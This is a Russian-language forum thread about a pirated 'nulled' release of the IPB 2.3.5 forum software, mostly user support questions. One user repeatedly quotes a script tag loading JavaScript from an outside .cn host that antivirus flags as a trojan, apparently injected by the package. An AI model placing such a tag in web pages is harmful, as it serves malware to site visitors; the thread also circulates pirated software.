[Скрипт] IPB v2.3.5 IBR.NULL- DAVIDOFF

Статус
В этой теме нельзя размещать новые ответы.
Тем не менее, я ко всем ipb null отношусь с недоверием, если они не от davidoff, так что ждём 2.3.6 от него :)
Хех,оч приятно)
Сорри не было инета из за погодных условий,скоро выложу
 
вот поставил я сей нулл все хорошо, вот только при запросе форума иногда авира блокирует страницу, открыл исходный код страницы ругаеться на этот ява скрипт, как от него избавится? на компе заразы не нашло. Как избавиться, на нул нет грехов но меня уже блокируют на серваке.

Код:
<script language="javascript" SRC="http://s.asde0msd.cn/s.js"></script>

Код:
Имя: HTML/Silly.Gen 
Обнаружен: 14/08/2007 
Вид: Троянская программа 
В реальных условиях: Да 
Отмеченные факты заражения: Низкий 
Потенциал распространения: Низкий 
Потенциал повреждений: Низкий 
Файл статистики: Нет 
Версия ядра: 7.04.01.62
 
вот поставил я сей нулл все хорошо, вот только при запросе форума иногда авира блокирует страницу, открыл исходный код страницы ругаеться на этот ява скрипт, как от него избавится? на компе заразы не нашло. Как избавиться, на нул нет грехов но меня уже блокируют на серваке.

Код:
<script language="javascript" SRC="http://s.asde0msd.cn/s.js"></script>

Это версия от maybe? У меня такая стоит не замечал. Где можно проверить?
 
вот поставил я сей нулл все хорошо, вот только при запросе форума иногда авира блокирует страницу, открыл исходный код страницы ругаеться на этот ява скрипт, как от него избавится? на компе заразы не нашло. Как избавиться, на нул нет грехов но меня уже блокируют на серваке.

Код:
<script language="javascript" SRC="http://s.asde0msd.cn/s.js"></script>

Код:
Имя: HTML/Silly.Gen 
Обнаружен: 14/08/2007 
Вид: Троянская программа 
В реальных условиях: Да 
Отмеченные факты заражения: Низкий 
Потенциал распространения: Низкий 
Потенциал повреждений: Низкий 
Файл статистики: Нет 
Версия ядра: 7.04.01.62

А ты не думал о том что, возможно тебя продефейсили ?! ;)
 
А ты не думал о том что, возможно тебя продефейсили ?! ;)
В локалке после установки чистого форума где нет доступа из мира? Уже не могу понять откуда оно береться, на компе ничего нету, там прошлось добрым десятком другим утилитами(0) файлы на сервере проверил нигде не могу найти упоминания про етот скрипт. HTMLChanger ничего не находит в файлах( как еще искать хз.крипт
 
Ребят неужели никто не может помочь? Хоть носом ткните, если ответ не увидел на свой вопрос.:bc:

Ребят ну помогите пожалуйста, почему невозможно просматривать профили пользователей? Скажите где может быть ошибка, либо хоть скажите в каком файле ковырять.
 
2 проблемы, обе связаны с модом Member Teams.

1) Не появляется кнопка "Кланы" на должном месте (рядом с кнопкой "календарь") как исправить?
2) Косячит функция второго лидера. Как её вообще убрать. Если не знаете, то скажите как сделать это. Проблемы со вторым лидером: а) Не отображается в списке клана. (якобы его нет в клане вообще).
б) Невозможно назначить модератором подфорума клана.
в) Не может добровольно из клана выйти.
г) Невозможно сместить.

Таму кто поможет, спасибо нажму :smmne:
 
Раньше использовал версию 2.1.6, в котрой при заходе на форум переключалась кодировка в win 1251. С этой версией 2.3.5, при заходе автоматом включается utf-8 и соответсвенно, вместо букв кракозяблики. В чём может быть проблема, не найду настроек.
 
Выложите версию не За'Null'еную
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху